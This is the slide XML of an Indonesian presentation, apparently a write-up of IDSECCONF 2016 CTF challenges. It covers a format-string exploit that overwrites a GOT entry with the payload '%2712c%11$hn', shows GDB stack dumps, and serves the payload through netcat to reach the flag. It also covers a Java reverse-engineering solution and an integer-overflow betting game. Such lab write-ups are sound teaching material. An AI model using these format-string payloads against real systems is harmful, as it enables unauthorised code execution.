              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x0A98</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> ⇒ format string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%hn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4" name="Google Shape;294;p44"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="876300" y="430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%&lt;nilai_overwrite&gt;c</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr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%&lt;index&gt;$hn</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1600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&lt;padding&gt;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&lt;alamat_overwrite&gt;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Payload Exploit</a:t>
            </a:r>
            <a:endParaRPr/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Alamat overwrite = 0x601238 =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\x38\x12\x60\x00\x00\x00\x00\x00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Nilai overwrite = 0x0A98 = 2712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 = 11 (didapatkan dari debugging)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Padding = sembarang string </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> karakter sedemikian sehingga alamat overwrite (merah) ada pada posisi kelipatan 8 di payload-nya; di sini digunakan </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> = 12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1" name="Google Shape;301;p45"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="876300" y="339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%2712c</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr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%11$hn</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1600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ABCDEFGHIJKL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\x38\x12\x60\x00\x00\x00\x00\x00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Eksperimen</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="Google Shape;307;p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 GDB, breakpoint sebelum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(0x400A81) dan setelahnya (0x400A8B)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sebelum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setelah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, fungsi telah berubah alamatnya:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="308" name="Google Shape;308;p46"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="876300" y="224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0000| 0x7fffffffbbd0 --&gt; 0x8ae00000000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0008| 0x7fffffffbbd8 --&gt; 0x7fffffffdc20 ("127.0.0.1")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0016| 0x7fffffffbbe0 ("%2712c%11$hnABCDEFGHIJKL8\022`")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0024| 0x7fffffffbbe8 ("1$hnABCDEFGHIJKL8\022`")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0032| 0x7fffffffbbf0 ("EFGHIJKL8\022`")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0040| 0x7fffffffbbf8 --&gt; 0x601238 --&gt;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0x400786 (&lt;close@plt+6&gt;: push 0x6)</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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0048| 0x7fffffffbc00 --&gt; 0x0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0056| 0x7fffffffbc08 --&gt; 0x0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9" name="Google Shape;309;p46"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="876300" y="430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0000| 0x7fffffffbbd0 --&gt; 0x8ae00000000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0008| 0x7fffffffbbd8 --&gt; 0x7fffffffdc20 ("127.0.0.1")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0016| 0x7fffffffbbe0 ("%2712c%11$hnABCDEFGHIJKL8\022`")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0024| 0x7fffffffbbe8 ("1$hnABCDEFGHIJKL8\022`")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0032| 0x7fffffffbbf0 ("EFGHIJKL8\022`")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0040| 0x7fffffffbbf8 --&gt; 0x601238 --&gt;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0x400a98 (push   rbp)</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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0048| 0x7fffffffbc00 --&gt; 0x0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0056| 0x7fffffffbc08 --&gt; 0x0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0" name="Google Shape;310;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5604475" y="3521425"/>
            <a:ext cx="1993200" cy="357000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd fmla="val -81538" name="adj1"/>
              <a:gd fmla="val -59541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close@PLT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="Google Shape;311;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5491775" y="5578950"/>
            <a:ext cx="1993200" cy="357000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd fmla="val -81538" name="adj1"/>
              <a:gd fmla="val -59541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FLAG!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Solusi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Google Shape;317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Dengan payload tersebut, jika program memanggil fungsi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/>
              <a:t>, fungsi flag yang justru dijalankan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payload di suatu server publik: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Kunjungi server challenge dan arahkan IP:port ke server kita tadi:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="318" name="Google Shape;318;p47"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="876300" y="262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echo -ne '&lt;payload_yang_tadi&gt;' | nc -l 2222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9" name="Google Shape;319;p47"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="876300" y="36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nc 128.199.174.161 17866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Selamat Datang Di -HOST GATEWAY-!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Masukkan Alamat IPv4 Tujuan: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103.10.105.200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Masukkan Port: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2222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Oke, mencoba terkoneksi 103.10.105.200:2222 saat!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�ABCDEFGHIJKL8`</a:t>
                      </a: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flag{format_masa_lalU}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Selesai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IDSECCONF 2016 CTF Online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 challenge (8 solved, 1 unsolved)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exploitation / pwning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Kriptografi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Reverse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yang digunakan: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IDA Pro + HexRays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decompiler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interpreter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GDB + PEDA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Beberapa detail tidak dipaparkan di presentasi ini (silakan merujuk ke paper writeup untuk detailnya)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“Kopi”</a:t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50 points</a:t>
            </a:r>
            <a:endParaRPr sz="1400"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Melakukan reverse engineer terhadap suatu kode Java yang telah di-compile (*.class) untuk mencari tahu seperti apa input </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>yang benar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Bytecode Java (*.class) dapat dengan mudah di-decompile dengan tools (misalnya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http://www.javadecompilers.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>) sehingga didapatkan source code yang </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mirip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> aslinya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melakukan sejumlah operasi terhadap input dengan suatu </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, kemudian digunakan untuk mengurangi suatu array integer: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Perlu dicari tahu array integer tersebut harus dikurangi berapa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889225" y="347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B00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buff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103,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109,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99,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106,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128,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81,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89,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126,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141,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156,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b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163,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241,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351,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474,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715,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1097,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1664,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2668,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4251,</a:t>
                      </a:r>
                      <a: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6890</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en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Solusi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Asumsi 4 huruf awal flag adalah “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flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>” (ASCII:  102, 108, 97, 103)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Bandingkan dengan 4 angka pertama program: 103, 109, 99, 106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Selisihnya adalah: 1, 1, 2, 3 ⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>deret fibonacci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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Kesimpulan: kurangkan array integer di program dengan deret fibonacci</a:t>
            </a:r>
            <a:endParaRPr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952500" y="32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{9FCD7D8F-738C-4878-A161-00D14C007D2B}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Python Console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buff = [103, 109, 99, 106, 128, 81, 89, 126, 141, 156, 163,</a:t>
                      </a:r>
                      <a:b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241, 351, 474, 715, 1097, 1664, 2668, 4251, 6890]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fibo = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377,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610, 987, 1597, 2584, 4181, 6765]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key = [buff[i] - fibo[i] for i in range(len(buff))]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print ''.join([chr(x) for x in key])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flag{ILikeJavainCTF}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“Bit”</a:t>
            </a:r>
            <a:endParaRPr/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100 points</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/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Melakukan reverse engineer suatu executable Linux (ELF) untuk memenangkan suatu “game” taruhan dengan memanfaatkan integer overflow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Terdapat 2 input: angka tebakan dan jumlah taruhan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Jika angka tebakan benar, dapat tambahan uang sejumlah taruhan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Jika angka tebakan salah, uang dikurangi sejumlah taruhan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Hanya satu kali input, tidak ada looping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Disassembly &amp; control flow graph (dengan IDA):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 akhir, total uang harus &gt; 100000 supaya dapat flag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50" y="3161763"/>
            <a:ext cx="5943600" cy="2066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21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3821525" y="3479325"/>
            <a:ext cx="2176500" cy="44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ek </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>taruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> &lt;= 100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5416375" y="4289675"/>
            <a:ext cx="2176500" cy="44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ek taruhan &gt;= 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